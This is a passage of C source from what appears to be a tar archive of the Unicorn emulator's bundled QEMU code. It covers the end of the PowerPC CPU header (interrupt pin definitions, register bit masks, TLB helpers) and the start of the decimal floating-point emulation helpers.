PPC2_ATOMIC_ISA206 | \ PPC2_FP_CVT_ISA206 | PPC2_FP_TST_ISA206 | \ PPC2_BCTAR_ISA207 | PPC2_LSQ_ISA207 | \ PPC2_ALTIVEC_207 | PPC2_ISA207S | PPC2_DFP | \ PPC2_FP_CVT_S64 | PPC2_TM | PPC2_PM_ISA206 | \ PPC2_ISA300) }; /*****************************************************************************/ /* * Memory access type : * may be needed for precise access rights control and precise exceptions. */ enum { /* 1 bit to define user level / supervisor access */ ACCESS_USER = 0x00, ACCESS_SUPER = 0x01, /* Type of instruction that generated the access */ ACCESS_CODE = 0x10, /* Code fetch access */ ACCESS_INT = 0x20, /* Integer load/store access */ ACCESS_FLOAT = 0x30, /* floating point load/store access */ ACCESS_RES = 0x40, /* load/store with reservation */ ACCESS_EXT = 0x50, /* external access */ ACCESS_CACHE = 0x60, /* Cache manipulation */ }; /* * Hardware interrupt sources: * all those exception can be raised simulteaneously */ /* Input pins definitions */ enum { /* 6xx bus input pins */ PPC6xx_INPUT_HRESET = 0, PPC6xx_INPUT_SRESET = 1, PPC6xx_INPUT_CKSTP_IN = 2, PPC6xx_INPUT_MCP = 3, PPC6xx_INPUT_SMI = 4, PPC6xx_INPUT_INT = 5, PPC6xx_INPUT_TBEN = 6, PPC6xx_INPUT_WAKEUP = 7, PPC6xx_INPUT_NB, }; enum { /* Embedded PowerPC input pins */ PPCBookE_INPUT_HRESET = 0, PPCBookE_INPUT_SRESET = 1, PPCBookE_INPUT_CKSTP_IN = 2, PPCBookE_INPUT_MCP = 3, PPCBookE_INPUT_SMI = 4, PPCBookE_INPUT_INT = 5, PPCBookE_INPUT_CINT = 6, PPCBookE_INPUT_NB, }; enum { /* PowerPC E500 input pins */ PPCE500_INPUT_RESET_CORE = 0, PPCE500_INPUT_MCK = 1, PPCE500_INPUT_CINT = 3, PPCE500_INPUT_INT = 4, PPCE500_INPUT_DEBUG = 6, PPCE500_INPUT_NB, }; enum { /* PowerPC 40x input pins */ PPC40x_INPUT_RESET_CORE = 0, PPC40x_INPUT_RESET_CHIP = 1, PPC40x_INPUT_RESET_SYS = 2, PPC40x_INPUT_CINT = 3, PPC40x_INPUT_INT = 4, PPC40x_INPUT_HALT = 5, PPC40x_INPUT_DEBUG = 6, PPC40x_INPUT_NB, }; enum { /* RCPU input pins */ PPCRCPU_INPUT_PORESET = 0, PPCRCPU_INPUT_HRESET = 1, PPCRCPU_INPUT_SRESET = 2, PPCRCPU_INPUT_IRQ0 = 3, PPCRCPU_INPUT_IRQ1 = 4, PPCRCPU_INPUT_IRQ2 = 5, PPCRCPU_INPUT_IRQ3 = 6, PPCRCPU_INPUT_IRQ4 = 7, PPCRCPU_INPUT_IRQ5 = 8, PPCRCPU_INPUT_IRQ6 = 9, PPCRCPU_INPUT_IRQ7 = 10, PPCRCPU_INPUT_NB, }; #if defined(TARGET_PPC64) enum { /* PowerPC 970 input pins */ PPC970_INPUT_HRESET = 0, PPC970_INPUT_SRESET = 1, PPC970_INPUT_CKSTP = 2, PPC970_INPUT_TBEN = 3, PPC970_INPUT_MCP = 4, PPC970_INPUT_INT = 5, PPC970_INPUT_THINT = 6, PPC970_INPUT_NB, }; enum { /* POWER7 input pins */ POWER7_INPUT_INT = 0, /* * POWER7 probably has other inputs, but we don't care about them * for any existing machine. We can wire these up when we need * them */ POWER7_INPUT_NB, }; enum { /* POWER9 input pins */ POWER9_INPUT_INT = 0, POWER9_INPUT_HINT = 1, POWER9_INPUT_NB, }; #endif /* Hardware exceptions definitions */ enum { /* External hardware exception sources */ PPC_INTERRUPT_RESET = 0, /* Reset exception */ PPC_INTERRUPT_WAKEUP, /* Wakeup exception */ PPC_INTERRUPT_MCK, /* Machine check exception */ PPC_INTERRUPT_EXT, /* External interrupt */ PPC_INTERRUPT_SMI, /* System management interrupt */ PPC_INTERRUPT_CEXT, /* Critical external interrupt */ PPC_INTERRUPT_DEBUG, /* External debug exception */ PPC_INTERRUPT_THERM, /* Thermal exception */ /* Internal hardware exception sources */ PPC_INTERRUPT_DECR, /* Decrementer exception */ PPC_INTERRUPT_HDECR, /* Hypervisor decrementer exception */ PPC_INTERRUPT_PIT, /* Programmable inteval timer interrupt */ PPC_INTERRUPT_FIT, /* Fixed interval timer interrupt */ PPC_INTERRUPT_WDT, /* Watchdog timer interrupt */ PPC_INTERRUPT_CDOORBELL, /* Critical doorbell interrupt */ PPC_INTERRUPT_DOORBELL, /* Doorbell interrupt */ PPC_INTERRUPT_PERFM, /* Performance monitor interrupt */ PPC_INTERRUPT_HMI, /* Hypervisor Maintainance interrupt */ PPC_INTERRUPT_HDOORBELL, /* Hypervisor Doorbell interrupt */ PPC_INTERRUPT_HVIRT, /* Hypervisor virtualization interrupt */ }; /* Processor Compatibility mask (PCR) */ enum { PCR_COMPAT_2_05 = PPC_BIT(62), PCR_COMPAT_2_06 = PPC_BIT(61), PCR_COMPAT_2_07 = PPC_BIT(60), PCR_COMPAT_3_00 = PPC_BIT(59), PCR_COMPAT_3_10 = PPC_BIT(58), #ifndef _MSC_VER PCR_VEC_DIS = PPC_BIT(0), /* Vec. disable (bit NA since POWER8) */ PCR_VSX_DIS = PPC_BIT(1), /* VSX disable (bit NA since POWER8) */ PCR_TM_DIS = PPC_BIT(2), /* Trans. memory disable (POWER8) */ #else #define PCR_VEC_DIS PPC_BIT(0) #define PCR_VSX_DIS PPC_BIT(1) #define PCR_TM_DIS PPC_BIT(2) #endif }; /* HMER/HMEER */ #ifndef _MSC_VER enum { HMER_MALFUNCTION_ALERT = PPC_BIT(0), HMER_PROC_RECV_DONE = PPC_BIT(2), HMER_PROC_RECV_ERROR_MASKED = PPC_BIT(3), HMER_TFAC_ERROR = PPC_BIT(4), HMER_TFMR_PARITY_ERROR = PPC_BIT(5), HMER_XSCOM_FAIL = PPC_BIT(8), HMER_XSCOM_DONE = PPC_BIT(9), HMER_PROC_RECV_AGAIN = PPC_BIT(11), HMER_WARN_RISE = PPC_BIT(14), HMER_WARN_FALL = PPC_BIT(15), HMER_SCOM_FIR_HMI = PPC_BIT(16), HMER_TRIG_FIR_HMI = PPC_BIT(17), HMER_HYP_RESOURCE_ERR = PPC_BIT(20), HMER_XSCOM_STATUS_MASK = PPC_BITMASK(21, 23), }; #else #define HMER_MALFUNCTION_ALERT PPC_BIT(0) #define HMER_PROC_RECV_DONE PPC_BIT(2) #define HMER_PROC_RECV_ERROR_MASKED PPC_BIT(3) #define HMER_TFAC_ERROR PPC_BIT(4) #define HMER_TFMR_PARITY_ERROR PPC_BIT(5) #define HMER_XSCOM_FAIL PPC_BIT(8) #define HMER_XSCOM_DONE PPC_BIT(9) #define HMER_PROC_RECV_AGAIN PPC_BIT(11) #define HMER_WARN_RISE PPC_BIT(14) #define HMER_WARN_FALL PPC_BIT(15) #define HMER_SCOM_FIR_HMI PPC_BIT(16) #define HMER_TRIG_FIR_HMI PPC_BIT(17) #define HMER_HYP_RESOURCE_ERR PPC_BIT(20) #define HMER_XSCOM_STATUS_MASK PPC_BITMASK(21, 23) #endif /* Alternate Interrupt Location (AIL) */ enum { AIL_NONE = 0, AIL_RESERVED = 1, AIL_0001_8000 = 2, AIL_C000_0000_0000_4000 = 3, }; /*****************************************************************************/ #define is_isa300(ctx) (!!(ctx->insns_flags2 & PPC2_ISA300)) target_ulong cpu_read_xer(CPUPPCState *env); void cpu_write_xer(CPUPPCState *env, target_ulong xer); /* * All 64-bit server processors compliant with arch 2.x, ie. 970 and newer, * have PPC_SEGMENT_64B. */ #define is_book3s_arch2x(ctx) (!!((ctx)->insns_flags & PPC_SEGMENT_64B)) static inline void cpu_get_tb_cpu_state(CPUPPCState *env, target_ulong *pc, target_ulong *cs_base, uint32_t *flags) { *pc = env->nip; *cs_base = 0; *flags = env->hflags; } void QEMU_NORETURN raise_exception(CPUPPCState *env, uint32_t exception); void QEMU_NORETURN raise_exception_ra(CPUPPCState *env, uint32_t exception, uintptr_t raddr); void QEMU_NORETURN raise_exception_err(CPUPPCState *env, uint32_t exception, uint32_t error_code); void QEMU_NORETURN raise_exception_err_ra(CPUPPCState *env, uint32_t exception, uint32_t error_code, uintptr_t raddr); static inline int booke206_tlbm_id(CPUPPCState *env, ppcmas_tlb_t *tlbm) { uintptr_t tlbml = (uintptr_t)tlbm; uintptr_t tlbl = (uintptr_t)env->tlb.tlbm; return (tlbml - tlbl) / sizeof(env->tlb.tlbm[0]); } static inline int booke206_tlb_size(CPUPPCState *env, int tlbn) { uint32_t tlbncfg = env->spr[SPR_BOOKE_TLB0CFG + tlbn]; int r = tlbncfg & TLBnCFG_N_ENTRY; return r; } static inline int booke206_tlb_ways(CPUPPCState *env, int tlbn) { uint32_t tlbncfg = env->spr[SPR_BOOKE_TLB0CFG + tlbn]; int r = tlbncfg >> TLBnCFG_ASSOC_SHIFT; return r; } static inline int booke206_tlbm_to_tlbn(CPUPPCState *env, ppcmas_tlb_t *tlbm) { int id = booke206_tlbm_id(env, tlbm); int end = 0; int i; for (i = 0; i < BOOKE206_MAX_TLBN; i++) { end += booke206_tlb_size(env, i); if (id < end) { return i; } } cpu_abort(env_cpu(env), "Unknown TLBe: %d\n", id); return 0; } static inline int booke206_tlbm_to_way(CPUPPCState *env, ppcmas_tlb_t *tlb) { int tlbn = booke206_tlbm_to_tlbn(env, tlb); int tlbid = booke206_tlbm_id(env, tlb); return tlbid & (booke206_tlb_ways(env, tlbn) - 1); } static inline ppcmas_tlb_t *booke206_get_tlbm(CPUPPCState *env, const int tlbn, target_ulong ea, int way) { int r; uint32_t ways = booke206_tlb_ways(env, tlbn); int ways_bits = ctz32(ways); int tlb_bits = ctz32(booke206_tlb_size(env, tlbn)); int i; way &= ways - 1; ea >>= MAS2_EPN_SHIFT; ea &= (1 << (tlb_bits - ways_bits)) - 1; r = (ea << ways_bits) | way; if (r >= booke206_tlb_size(env, tlbn)) { return NULL; } /* bump up to tlbn index */ for (i = 0; i < tlbn; i++) { r += booke206_tlb_size(env, i); } return &env->tlb.tlbm[r]; } /* returns bitmap of supported page sizes for a given TLB */ static inline uint32_t booke206_tlbnps(CPUPPCState *env, const int tlbn) { uint32_t ret = 0; if ((env->spr[SPR_MMUCFG] & MMUCFG_MAVN) == MMUCFG_MAVN_V2) { /* MAV2 */ ret = env->spr[SPR_BOOKE_TLB0PS + tlbn]; } else { uint32_t tlbncfg = env->spr[SPR_BOOKE_TLB0CFG + tlbn]; uint32_t min = (tlbncfg & TLBnCFG_MINSIZE) >> TLBnCFG_MINSIZE_SHIFT; uint32_t max = (tlbncfg & TLBnCFG_MAXSIZE) >> TLBnCFG_MAXSIZE_SHIFT; int i; for (i = min; i <= max; i++) { ret |= (1 << (i << 1)); } } return ret; } static inline void booke206_fixed_size_tlbn(CPUPPCState *env, const int tlbn, ppcmas_tlb_t *tlb) { uint8_t i; int32_t tsize = -1; for (i = 0; i < 32; i++) { if ((env->spr[SPR_BOOKE_TLB0PS + tlbn]) & (1ULL << i)) { if (tsize == -1) { tsize = i; } else { return; } } } /* TLBnPS unimplemented? Odd.. */ assert(tsize != -1); tlb->mas1 &= ~MAS1_TSIZE_MASK; tlb->mas1 |= ((uint32_t)tsize) << MAS1_TSIZE_SHIFT; } static inline bool msr_is_64bit(CPUPPCState *env, target_ulong msr) { if (env->mmu_model == POWERPC_MMU_BOOKE206) { return msr & (1ULL << MSR_CM); } return msr & (1ULL << MSR_SF); } /** * Check whether register rx is in the range between start and * start + nregs (as needed by the LSWX and LSWI instructions) */ static inline bool lsw_reg_in_range(int start, int nregs, int rx) { return (start + nregs <= 32 && rx >= start && rx < start + nregs) || (start + nregs > 32 && (rx >= start || rx < start + nregs - 32)); } /* Accessors for FP, VMX and VSX registers */ #if defined(HOST_WORDS_BIGENDIAN) #define VsrB(i) u8[i] #define VsrSB(i) s8[i] #define VsrH(i) u16[i] #define VsrSH(i) s16[i] #define VsrW(i) u32[i] #define VsrSW(i) s32[i] #define VsrD(i) u64[i] #define VsrSD(i) s64[i] #else #define VsrB(i) u8[15 - (i)] #define VsrSB(i) s8[15 - (i)] #define VsrH(i) u16[7 - (i)] #define VsrSH(i) s16[7 - (i)] #define VsrW(i) u32[3 - (i)] #define VsrSW(i) s32[3 - (i)] #define VsrD(i) u64[1 - (i)] #define VsrSD(i) s64[1 - (i)] #endif static inline int vsr64_offset(int i, bool high) { return offsetof(CPUPPCState, vsr[i].VsrD(high ? 0 : 1)); } static inline int vsr_full_offset(int i) { return offsetof(CPUPPCState, vsr[i].u64[0]); } static inline int fpr_offset(int i) { return vsr64_offset(i, true); } static inline uint64_t *cpu_fpr_ptr(CPUPPCState *env, int i) { return (uint64_t *)((uintptr_t)env + fpr_offset(i)); } static inline uint64_t *cpu_vsrl_ptr(CPUPPCState *env, int i) { return (uint64_t *)((uintptr_t)env + vsr64_offset(i, false)); } static inline long avr64_offset(int i, bool high) { return vsr64_offset(i + 32, high); } static inline int avr_full_offset(int i) { return vsr_full_offset(i + 32); } static inline ppc_avr_t *cpu_avr_ptr(CPUPPCState *env, int i) { return (ppc_avr_t *)((uintptr_t)env + avr_full_offset(i)); } void dump_mmu(CPUPPCState *env); void ppc_maybe_bswap_register(CPUPPCState *env, uint8_t *mem_buf, int len); #endif /* PPC_CPU_H */ ���������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/ppc/dfp_helper.c����������������������������������������������������������0000664�0000000�0000000�00000160757�14675241067�0020517�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * PowerPC Decimal Floating Point (DPF) emulation helpers for QEMU. * * Copyright (c) 2014 IBM Corporation. * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "exec/helper-proto.h" #define DECNUMDIGITS 34 #include "libdecnumber/decContext.h" #include "libdecnumber/decNumber.h" #include "libdecnumber/dpd/decimal32.h" #include "libdecnumber/dpd/decimal64.h" #include "libdecnumber/dpd/decimal128.h" static void get_dfp64(ppc_vsr_t *dst, ppc_fprp_t *dfp) { dst->VsrD(1) = dfp->VsrD(0); } static void get_dfp128(ppc_vsr_t *dst, ppc_fprp_t *dfp) { dst->VsrD(0) = dfp[0].VsrD(0); dst->VsrD(1) = dfp[1].VsrD(0); } static void set_dfp64(ppc_fprp_t *dfp, ppc_vsr_t *src) { dfp->VsrD(0) = src->VsrD(1); } static void set_dfp128(ppc_fprp_t *dfp, ppc_vsr_t *src) { dfp[0].VsrD(0) = src->VsrD(0); dfp[1].VsrD(0) = src->VsrD(1); } struct PPC_DFP { CPUPPCState *env; ppc_vsr_t vt, va, vb; decNumber t, a, b; decContext context; uint8_t crbf; }; static void dfp_prepare_rounding_mode(decContext *context, uint64_t fpscr) { enum rounding rnd; switch ((fpscr & FP_DRN) >> FPSCR_DRN0) { case 0: rnd = DEC_ROUND_HALF_EVEN; break; case 1: rnd = DEC_ROUND_DOWN; break; case 2: rnd = DEC_ROUND_CEILING; break; case 3: rnd = DEC_ROUND_FLOOR; break; case 4: rnd = DEC_ROUND_HALF_UP; break; case 5: rnd = DEC_ROUND_HALF_DOWN; break; case 6: rnd = DEC_ROUND_UP; break; case 7: rnd = DEC_ROUND_05UP; break; default: g_assert_not_reached(); } decContextSetRounding(context, rnd); } static void dfp_set_round_mode_from_immediate(uint8_t r, uint8_t rmc, struct PPC_DFP *dfp) { enum rounding rnd; if (r == 0) { switch (rmc & 3) { case 0: rnd = DEC_ROUND_HALF_EVEN; break; case 1: rnd = DEC_ROUND_DOWN; break; case 2: rnd = DEC_ROUND_HALF_UP; break; case 3: /* use FPSCR rounding mode */ return; default: assert(0); /* cannot get here */ } } else { /* r == 1 */ switch (rmc & 3) { case 0: rnd = DEC_ROUND_CEILING; break; case 1: rnd = DEC_ROUND_FLOOR; break; case 2: rnd = DEC_ROUND_UP; break; case 3: rnd = DEC_ROUND_HALF_DOWN; break; default: assert(0); /* cannot get here */ } } decContextSetRounding(&dfp->context, rnd); } static void dfp_prepare_decimal64(struct PPC_DFP *dfp, ppc_fprp_t *a, ppc_fprp_t *b, CPUPPCState *env) { decContextDefault(&dfp->context, DEC_INIT_DECIMAL64); dfp_prepare_rounding_mode(&dfp->context, env->fpscr); dfp->env = env; if (a) { get_dfp64(&dfp->va, a); decimal64ToNumber((decimal64 *)&dfp->va.VsrD(1), &dfp->a); } else { dfp->va.VsrD(1) = 0; decNumberZero(&dfp->a); } if (b) { get_dfp64(&dfp->vb, b); decimal64ToNumber((decimal64 *)&dfp->vb.VsrD(1), &dfp->b); } else { dfp->vb.VsrD(1) = 0; decNumberZero(&dfp->b); } } static void dfp_prepare_decimal128(struct PPC_DFP *dfp, ppc_fprp_t *a, ppc_fprp_t *b, CPUPPCState *env) { decContextDefault(&dfp->context, DEC_INIT_DECIMAL128); dfp_prepare_rounding_mode(&dfp->context, env->fpscr); dfp->env = env; if (a) { get_dfp128(&dfp->va, a); decimal128ToNumber((decimal128 *)&dfp->va, &dfp->a); } else { dfp->va.VsrD(0) = dfp->va.VsrD(1) = 0; decNumberZero(&dfp->a); } if (b) { get_dfp128(&dfp->vb, b); decimal128ToNumber((decimal128 *)&dfp->vb, &dfp->b); } else { dfp->vb.VsrD(0) = dfp->vb.VsrD(1) = 0; decNumberZero(&dfp->b); } } static void dfp_finalize_decimal64(struct PPC_DFP *dfp) { decimal64FromNumber((decimal64 *)&dfp->vt.VsrD(1), &dfp->t, &dfp->context); } static void dfp_finalize_decimal128(struct PPC_DFP *dfp) { decimal128FromNumber((decimal128 *)&dfp->vt, &dfp->t, &dfp->context); } static void dfp_set_FPSCR_flag(struct PPC_DFP *dfp, uint64_t flag, uint64_t enabled) { dfp->env->fpscr |= (flag | FP_FX); if (dfp->env->fpscr & enabled) { dfp->env->fpscr |= FP_FEX; } } static void dfp_set_FPRF_from_FRT_with_context(struct PPC_DFP *dfp, decContext *context) { uint64_t fprf = 0; /* construct FPRF */ switch (decNumberClass(&dfp->t, context)) { case DEC_CLASS_SNAN: fprf = 0x01; break; case DEC_CLASS_QNAN: fprf = 0x11; break; case DEC_CLASS_NEG_INF: fprf = 0x09; break; case DEC_CLASS_NEG_NORMAL: fprf = 0x08; break; case DEC_CLASS_NEG_SUBNORMAL: fprf = 0x18; break; case DEC_CLASS_NEG_ZERO: fprf = 0x12; break; case DEC_CLASS_POS_ZERO: fprf = 0x02; break; case DEC_CLASS_POS_SUBNORMAL: fprf = 0x14; break; case DEC_CLASS_POS_NORMAL: fprf = 0x04; break; case DEC_CLASS_POS_INF: fprf = 0x05; break; default: assert(0); /* should never get here */ } dfp->env->fpscr &= ~FP_FPRF; dfp->env->fpscr |= (fprf << FPSCR_FPRF); } static void dfp_set_FPRF_from_FRT(struct PPC_DFP *dfp) { dfp_set_FPRF_from_FRT_with_context(dfp, &dfp->context); } static void dfp_set_FPRF_from_FRT_short(struct PPC_DFP *dfp) { decContext shortContext; decContextDefault(&shortContext, DEC_INIT_DECIMAL32); dfp_set_FPRF_from_FRT_with_context(dfp, &shortContext); } static void dfp_set_FPRF_from_FRT_long(struct PPC_DFP *dfp) { decContext longContext; decContextDefault(&longContext, DEC_INIT_DECIMAL64); dfp_set_FPRF_from_FRT_with_context(dfp, &longContext); } static void dfp_check_for_OX(struct PPC_DFP *dfp) { if (dfp->context.status & DEC_Overflow) { dfp_set_FPSCR_flag(dfp, FP_OX, FP_OE); } } static void dfp_check_for_UX(struct PPC_DFP *dfp) { if (dfp->context.status & DEC_Underflow) { dfp_set_FPSCR_flag(dfp, FP_UX, FP_UE); } } static void dfp_check_for_XX(struct PPC_DFP *dfp) { if (dfp->context.status & DEC_Inexact) { dfp_set_FPSCR_flag(dfp, FP_XX | FP_FI, FP_XE); } } static void dfp_check_for_ZX(struct PPC_DFP *dfp) { if (dfp->context.status & DEC_Division_by_zero) { dfp_set_FPSCR_flag(dfp, FP_ZX, FP_ZE); } } static void dfp_check_for_VXSNAN(struct PPC_DFP *dfp) { if (dfp->context.status & DEC_Invalid_operation) { if (decNumberIsSNaN(&dfp->a) || decNumberIsSNaN(&dfp->b)) { dfp_set_FPSCR_flag(dfp, FP_VX | FP_VXSNAN, FP_VE); } } } static void dfp_check_for_VXSNAN_and_convert_to_QNaN(struct PPC_DFP *dfp) { if (decNumberIsSNaN(&dfp->t)) { dfp->t.bits &= ~DECSNAN; dfp->t.bits |= DECNAN; dfp_set_FPSCR_flag(dfp, FP_VX | FP_VXSNAN, FP_VE); } } static void dfp_check_for_VXISI(struct PPC_DFP *dfp, int testForSameSign) { if (dfp->context.status & DEC_Invalid_operation) { if (decNumberIsInfinite(&dfp->a) && decNumberIsInfinite(&dfp->b)) { int same = decNumberClass(&dfp->a, &dfp->context) == decNumberClass(&dfp->b, &dfp->context); if ((same && testForSameSign) || (!same && !testForSameSign)) { dfp_set_FPSCR_flag(dfp, FP_VX | FP_VXISI, FP_VE); } } } } static void dfp_check_for_VXISI_add(struct PPC_DFP *dfp) { dfp_check_for_VXISI(dfp, 0); } static void dfp_check_for_VXISI_subtract(struct PPC_DFP *dfp) { dfp_check_for_VXISI(dfp, 1); } static void dfp_check_for_VXIMZ(struct PPC_DFP *dfp) { if (dfp->context.status & DEC_Invalid_operation) { if ((decNumberIsInfinite(&dfp->a) && decNumberIsZero(&dfp->b)) || (decNumberIsInfinite(&dfp->b) && decNumberIsZero(&dfp->a))) { dfp_set_FPSCR_flag(dfp, FP_VX | FP_VXIMZ, FP_VE); } } } static void dfp_check_for_VXZDZ(struct PPC_DFP *dfp) { if (dfp->context.status & DEC_Division_undefined) { dfp_set_FPSCR_flag(dfp, FP_VX | FP_VXZDZ, FP_VE); } } static void dfp_check_for_VXIDI(struct PPC_DFP *dfp) { if (dfp->context.status & DEC_Invalid_operation) { if (decNumberIsInfinite(&dfp->a) && decNumberIsInfinite(&dfp->b)) { dfp_set_FPSCR_flag(dfp, FP_VX | FP_VXIDI, FP_VE); } } } static void dfp_check_for_VXVC(struct PPC_DFP *dfp) { if (decNumberIsNaN(&dfp->a) || decNumberIsNaN(&dfp->b)) { dfp_set_FPSCR_flag(dfp, FP_VX | FP_VXVC, FP_VE); } } static void dfp_check_for_VXCVI(struct PPC_DFP *dfp) { if ((dfp->context.status & DEC_Invalid_operation) && (!decNumberIsSNaN(&dfp->a)) && (!decNumberIsSNaN(&dfp->b))) { dfp_set_FPSCR_flag(dfp, FP_VX | FP_VXCVI, FP_VE); } } static void dfp_set_CRBF_from_T(struct PPC_DFP *dfp) { if (decNumberIsNaN(&dfp->t)) { dfp->crbf = 1; } else if (decNumberIsZero(&dfp->t)) { dfp->crbf = 2; } else if (decNumberIsNegative(&dfp->t)) { dfp->crbf = 8; } else { dfp->crbf = 4; } } static void dfp_set_FPCC_from_CRBF(struct PPC_DFP *dfp) { dfp->env->fpscr &= ~FP_FPCC; dfp->env->fpscr |= (dfp->crbf << FPSCR_FPCC); } static inline void dfp_makeQNaN(decNumber *dn) { dn->bits &= ~DECSPECIAL; dn->bits |= DECNAN; } static inline int dfp_get_digit(decNumber *dn, int n) { assert(DECDPUN == 3); int unit = n / DECDPUN; int dig = n % DECDPUN; switch (dig) { case 0: return dn->lsu[unit] % 10; case 1: return (dn->lsu[unit] / 10) % 10; case 2: return dn->lsu[unit] / 100; } g_assert_not_reached(); } #define DFP_HELPER_TAB(op, dnop, postprocs, size) \ void helper_##op(CPUPPCState *env, ppc_fprp_t *t, ppc_fprp_t *a, \ ppc_fprp_t *b) \ { \ struct PPC_DFP dfp; \ dfp_prepare_decimal##size(&dfp, a, b, env); \ dnop(&dfp.t, &dfp.a, &dfp.b, &dfp.context); \ dfp_finalize_decimal##size(&dfp); \ postprocs(&dfp); \ set_dfp##size(t, &dfp.vt); \ } static void ADD_PPs(struct PPC_DFP *dfp) { dfp_set_FPRF_from_FRT(dfp); dfp_check_for_OX(dfp); dfp_check_for_UX(dfp); dfp_check_for_XX(dfp); dfp_check_for_VXSNAN(dfp); dfp_check_for_VXISI_add(dfp); } DFP_HELPER_TAB(dadd, decNumberAdd, ADD_PPs, 64) DFP_HELPER_TAB(daddq, decNumberAdd, ADD_PPs, 128) static void SUB_PPs(struct PPC_DFP *dfp) { dfp_set_FPRF_from_FRT(dfp); dfp_check_for_OX(dfp); dfp_check_for_UX(dfp); dfp_check_for_XX(dfp); dfp_check_for_VXSNAN(dfp); dfp_check_for_VXISI_subtract(dfp); } DFP_HELPER_TAB(dsub, decNumberSubtract, SUB_PPs, 64) DFP_HELPER_TAB(dsubq, decNumberSubtract, SUB_PPs, 128) static void MUL_PPs(struct PPC_DFP *dfp) { dfp_set_FPRF_from_FRT(dfp); dfp_check_for_OX(dfp); dfp_check_for_UX(dfp); dfp_check_for_XX(dfp); dfp_check_for_VXSNAN(dfp); dfp_check_for_VXIMZ(dfp); } DFP_HELPER_TAB(dmul, decNumberMultiply, MUL_PPs, 64) DFP_HELPER_TAB(dmulq, decNumberMultiply, MUL_PPs, 128) static void DIV_PPs(struct PPC_DFP *dfp) { dfp_set_FPRF_from_FRT(dfp); dfp_check_for_OX(dfp); dfp_check_for_UX(dfp); dfp_check_for_ZX(dfp); dfp_check_for_XX(dfp); dfp_check_for_VXSNAN(dfp); dfp_check_for_VXZDZ(dfp); dfp_check_for_VXIDI(dfp); } DFP_HELPER_TAB(ddiv, decNumberDivide, DIV_PPs, 64) DFP_HELPER_TAB(ddivq, decNumberDivide, DIV_PPs, 128) #define DFP_HELPER_BF_AB(op, dnop, postprocs, size) \ uint32_t helper_##op(CPUPPCState *env, ppc_fprp_t *a, ppc_fprp_t *b) \ { \ struct PPC_DFP dfp; \ dfp_prepare_decimal##size(&dfp, a, b, env); \ dnop(&dfp.t, &dfp.a, &dfp.b, &dfp.context); \ dfp_finalize_decimal##size(&dfp); \ postprocs(&dfp); \ return dfp.crbf; \ } static void CMPU_PPs(struct PPC_DFP *dfp) { dfp_set_CRBF_from_T(dfp); dfp_set_FPCC_from_CRBF(dfp); dfp_check_for_VXSNAN(dfp); } DFP_HELPER_BF_AB(dcmpu, decNumberCompare, CMPU_PPs, 64) DFP_HELPER_BF_AB(dcmpuq, decNumberCompare, CMPU_PPs, 128) static void CMPO_PPs(struct PPC_DFP *dfp) { dfp_set_CRBF_from_T(dfp); dfp_set_FPCC_from_CRBF(dfp); dfp_check_for_VXSNAN(dfp); dfp_check_for_VXVC(dfp); } DFP_HELPER_BF_AB(dcmpo, decNumberCompare, CMPO_PPs, 64) DFP_HELPER_BF_AB(dcmpoq, decNumberCompare, CMPO_PPs, 128) #define DFP_HELPER_TSTDC(op, size) \ uint32_t helper_##op(CPUPPCState *env, ppc_fprp_t *a, uint32_t dcm) \ { \ struct PPC_DFP dfp; \ int match = 0; \ \ dfp_prepare_decimal##size(&dfp, a, 0, env); \ \ match |= (dcm & 0x20) && decNumberIsZero(&dfp.a); \ match |= (dcm & 0x10) && decNumberIsSubnormal(&dfp.a, &dfp.context); \ match |= (dcm & 0x08) && decNumberIsNormal(&dfp.a, &dfp.context); \ match |= (dcm & 0x04) && decNumberIsInfinite(&dfp.a); \ match |= (dcm & 0x02) && decNumberIsQNaN(&dfp.a); \ match |= (dcm & 0x01) && decNumberIsSNaN(&dfp.a); \ \ if (decNumberIsNegative(&dfp.a)) { \ dfp.crbf = match ? 0xA : 0x8; \ } else { \ dfp.crbf = match ? 0x2 : 0x0; \ } \ \ dfp_set_FPCC_from_CRBF(&dfp); \ return dfp.crbf; \ } DFP_HELPER_TSTDC(dtstdc, 64) DFP_HELPER_TSTDC(dtstdcq, 128) #define DFP_HELPER_TSTDG(op, size) \ uint32_t helper_##op(CPUPPCState *env, ppc_fprp_t *a, uint32_t dcm) \ { \ struct PPC_DFP dfp; \ int minexp, maxexp, nzero_digits, nzero_idx, is_negative, is_zero, \ is_extreme_exp, is_subnormal, is_normal, leftmost_is_nonzero, \ match; \ \ dfp_prepare_decimal##size(&dfp, a, 0, env); \ \ if ((size) == 64) { \ minexp = -398; \ maxexp = 369; \ nzero_digits = 16; \ nzero_idx = 5; \ } else if ((size) == 128) { \ minexp = -6176; \ maxexp = 6111; \ nzero_digits = 34; \ nzero_idx = 11; \ } \ \ is_negative = decNumberIsNegative(&dfp.a); \ is_zero = decNumberIsZero(&dfp.a); \ is_extreme_exp = (dfp.a.exponent == maxexp) || \ (dfp.a.exponent == minexp); \ is_subnormal = decNumberIsSubnormal(&dfp.a, &dfp.context); \ is_normal = decNumberIsNormal(&dfp.a, &dfp.context); \ leftmost_is_nonzero = (dfp.a.digits == nzero_digits) && \ (dfp.a.lsu[nzero_idx] != 0); \ match = 0; \ \ match |= (dcm & 0x20) && is_zero && !is_extreme_exp; \ match |= (dcm & 0x10) && is_zero && is_extreme_exp; \ match |= (dcm & 0x08) && \ (is_subnormal || (is_normal && is_extreme_exp)); \ match |= (dcm & 0x04) && is_normal && !is_extreme_exp && \ !leftmost_is_nonzero; \ match |= (dcm & 0x02) && is_normal && !is_extreme_exp && \ leftmost_is_nonzero; \ match |= (dcm & 0x01) && decNumberIsSpecial(&dfp.a); \ \ if (is_negative) { \ dfp.crbf = match ? 0xA : 0x8; \ } else { \ dfp.crbf = match ? 0x2 : 0x0; \ } \ \ dfp_set_FPCC_from_CRBF(&dfp); \ return dfp.crbf; \ } DFP_HELPER_TSTDG(dtstdg, 64) 